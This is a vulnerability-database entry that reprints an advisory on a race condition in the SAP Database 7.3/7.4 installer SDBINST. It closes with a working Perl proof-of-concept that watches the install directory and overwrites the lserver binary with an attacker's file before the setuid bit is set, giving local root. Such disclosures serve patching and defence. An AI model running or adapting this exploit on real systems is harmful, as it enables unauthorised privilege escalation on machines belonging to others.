SAP Database 7.3/7.4 SDBINST Race Condition Vulnerability

2014-07-01T00:00:00
ID SSV:76330
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/7421/info

SAP Database SDBINST has been reported prone to a race condition vulnerability.

It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files.

An attacker may exploit this vulnerability to gain root privileges. 

#!/bin/perl

while (1) {

$test =`grep -sh PRECOM.ins
/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;

if ( $test =~ /PRECOM/ ) {
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
exit(1);
}

}